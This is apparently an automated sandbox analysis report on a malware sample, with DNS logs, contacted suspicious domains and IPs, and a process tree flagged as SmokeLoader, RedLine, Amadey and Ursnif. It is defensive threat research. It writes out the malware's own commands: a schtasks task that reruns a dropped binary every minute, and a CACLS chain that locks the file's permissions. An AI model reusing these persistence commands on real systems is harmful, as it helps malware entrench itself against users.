                                                                                                                                                                                                Nov 19, 2022 16:58:37.876419067 CET8.8.8.8192.168.2.30xbcb5No error (0)s3-w.us-east-1.amazonaws.com52.216.220.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:37.876419067 CET8.8.8.8192.168.2.30xbcb5No error (0)s3-w.us-east-1.amazonaws.com52.216.25.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:37.876419067 CET8.8.8.8192.168.2.30xbcb5No error (0)s3-w.us-east-1.amazonaws.com52.217.174.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:37.876419067 CET8.8.8.8192.168.2.30xbcb5No error (0)s3-w.us-east-1.amazonaws.com52.216.35.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:40.144412041 CET8.8.8.8192.168.2.30xacaNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:58:45.921497107 CET8.8.8.8192.168.2.30x71c3No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:59:12.443828106 CET8.8.8.8192.168.2.30x1728Name error (3)2w3ke1f81kujb1erhj396kfejh2wgw.kgpoaj9k4sgjd4aitghsrtuxhqnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:59:31.164213896 CET8.8.8.8192.168.2.30x6676No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:59:31.164213896 CET8.8.8.8192.168.2.30x6676No error (0)youtube-ui.l.google.com216.58.215.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:59:31.164213896 CET8.8.8.8192.168.2.30x6676No error (0)youtube-ui.l.google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:59:31.164213896 CET8.8.8.8192.168.2.30x6676No error (0)youtube-ui.l.google.com172.217.168.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:59:31.164213896 CET8.8.8.8192.168.2.30x6676No error (0)youtube-ui.l.google.com142.250.203.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 16:59:46.472574949 CET8.8.8.8192.168.2.30x3551Server failure (2)lentaphoto.atnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                Nov 19, 2022 17:01:07.054994106 CET8.8.8.8192.168.2.30x127dNo error (0)iujdhsndjfks.ru134.0.118.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                • fs.microsoft.com
                                                                                                                                                                                                • https:
                                                                                                                                                                                                  • www.bing.com
                                                                                                                                                                                                • srshf.com
                                                                                                                                                                                                • iplogger.com
                                                                                                                                                                                                • cdn-102.anonfiles.com
                                                                                                                                                                                                • anonfiles.com
                                                                                                                                                                                                • transfer.sh
                                                                                                                                                                                                • hoteldostyk.com
                                                                                                                                                                                                • github.com
                                                                                                                                                                                                • raw.githubusercontent.com
                                                                                                                                                                                                • bitbucket.org
                                                                                                                                                                                                • bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                • t.me
                                                                                                                                                                                                • www.youtube.com
                                                                                                                                                                                                • login.live.com
                                                                                                                                                                                                • watson.telemetry.microsoft.com
                                                                                                                                                                                                • ijksciexii.com
                                                                                                                                                                                                  • o36fafs3sn6xou.com
                                                                                                                                                                                                • bpbdsdk.net
                                                                                                                                                                                                • umixvvejem.com
                                                                                                                                                                                                • qqfarpecak.com
                                                                                                                                                                                                • oorjfnwj.net
                                                                                                                                                                                                • awjddgg.com
                                                                                                                                                                                                • vewejolrw.net
                                                                                                                                                                                                • ttvgdova.com
                                                                                                                                                                                                • ujapeckwwf.net
                                                                                                                                                                                                • llobgypg.org
                                                                                                                                                                                                • bqrca.net
                                                                                                                                                                                                • vovqsb.net
                                                                                                                                                                                                • xqiywpnnx.com
                                                                                                                                                                                                • 193.56.146.168
                                                                                                                                                                                                • hebuwvwfs.net
                                                                                                                                                                                                • kjwivofpbv.net
                                                                                                                                                                                                • uflscskn.org
                                                                                                                                                                                                • wnamt.org
                                                                                                                                                                                                • pbxlqwo.com
                                                                                                                                                                                                • hpnwth.net
                                                                                                                                                                                                • uilamexewu.net
                                                                                                                                                                                                • xqqjug.org
                                                                                                                                                                                                • eewqpkgoat.org
                                                                                                                                                                                                • ipmxouwmp.com
                                                                                                                                                                                                • pccxxtjnt.com
                                                                                                                                                                                                • dygmllr.com
                                                                                                                                                                                                • mwcxqjbc.com
                                                                                                                                                                                                • pmgurxcfse.com
                                                                                                                                                                                                • anhnwnhtgc.net
                                                                                                                                                                                                • xqculhri.net
                                                                                                                                                                                                • lruucyh.com
                                                                                                                                                                                                • 193.56.146.174
                                                                                                                                                                                                • 116.202.5.101
                                                                                                                                                                                                • 65.21.213.208:3000
                                                                                                                                                                                                • iujdhsndjfks.ru

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                Start time:16:57:03
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Users\user\Desktop\q4Z52wRd28.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\Desktop\q4Z52wRd28.exe
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:346112 bytes
                                                                                                                                                                                                MD5 hash:A687E1C326C9F03569BBFEF53E21C315
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.256917988.0000000000970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.340457364.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.340559376.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.340559376.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.340166873.0000000000871000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.340651575.0000000000C11000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.340651575.0000000000C11000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                Reputation:low

                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                Start time:16:57:13
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                Imagebase:0x7ff69fe90000
                                                                                                                                                                                                File size:3933184 bytes
                                                                                                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.327872359.0000000003851000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.327872359.0000000003851000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                Start time:16:58:02
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\cttgcew
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\cttgcew
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:346112 bytes
                                                                                                                                                                                                MD5 hash:A687E1C326C9F03569BBFEF53E21C315
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.393477736.0000000000880000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.393477736.0000000000880000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000003.381680800.0000000000870000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.393611577.00000000008D1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000B.00000002.393447143.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                • Detection: 27%, ReversingLabs
                                                                                                                                                                                                Reputation:low

                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                Start time:16:58:19
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\A852.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\A852.exe
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:385536 bytes
                                                                                                                                                                                                MD5 hash:0E455D9C65E7D53A67C227DCD8D70FB8
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.424634553.0000000000891000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.428145666.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                Reputation:low

                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                Start time:16:58:22
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\B4A7.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\B4A7.exe
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:1235912 bytes
                                                                                                                                                                                                MD5 hash:F96144B1D5B53D93CAADDDADE38DB5E9
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000003.542369400.000000000070F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000003.527908931.000000000D290000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000D.00000003.527908931.000000000D290000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000D.00000003.501276183.00000000024E6000.00000040.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000003.533006922.000000000D292000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000003.541178072.0000000000701000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.562231967.0000000000714000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                • Detection: 21%, ReversingLabs
                                                                                                                                                                                                Reputation:low

                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                Start time:16:58:24
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:385536 bytes
                                                                                                                                                                                                MD5 hash:0E455D9C65E7D53A67C227DCD8D70FB8
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000E.00000002.806199493.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000E.00000002.793487100.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000002.793487100.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000E.00000002.805707000.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000E.00000002.778202209.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000E.00000002.787937568.0000000000A41000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000E.00000003.603169508.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                Reputation:low

                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                Start time:16:58:29
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\CF35.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\CF35.exe
                                                                                                                                                                                                Imagebase:0x7ff74f320000
                                                                                                                                                                                                File size:3188224 bytes
                                                                                                                                                                                                MD5 hash:44A7E13ECC55CE9797C5121B230D9927
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                • Detection: 23%, ReversingLabs
                                                                                                                                                                                                Reputation:low

                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                Start time:16:58:32
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
                                                                                                                                                                                                Imagebase:0xea0000
                                                                                                                                                                                                File size:185856 bytes
                                                                                                                                                                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                Start time:16:58:33
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                Start time:16:58:33
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
                                                                                                                                                                                                Imagebase:0xb0000
                                                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                Start time:16:58:33
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff745070000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                Start time:16:58:33
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                                                                Imagebase:0xb0000
                                                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                Start time:16:58:33
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:CACLS "rovwer.exe" /P "user:N"
                                                                                                                                                                                                Imagebase:0xb80000
                                                                                                                                                                                                File size:27648 bytes
                                                                                                                                                                                                MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                Start time:16:58:34
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\E35A.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\E35A.exe
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:342528 bytes
                                                                                                                                                                                                MD5 hash:19A79DADDFAAC09499E79ADE27E756F8
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000018.00000002.792008341.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000002.816564354.0000000001209000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000018.00000002.797855651.00000000008D1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                • Detection: 38%, ReversingLabs

                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                Start time:16:58:34
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:CACLS "rovwer.exe" /P "user:R" /E
                                                                                                                                                                                                Imagebase:0xb80000
                                                                                                                                                                                                File size:27648 bytes
                                                                                                                                                                                                MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                Start time:16:58:35
                                                                                                                                                                                                Start date:19/11/2022
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:385536 bytes
                                                                                                                                                                                                MD5 hash:0E455D9C65E7D53A67C227DCD8D70FB8
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
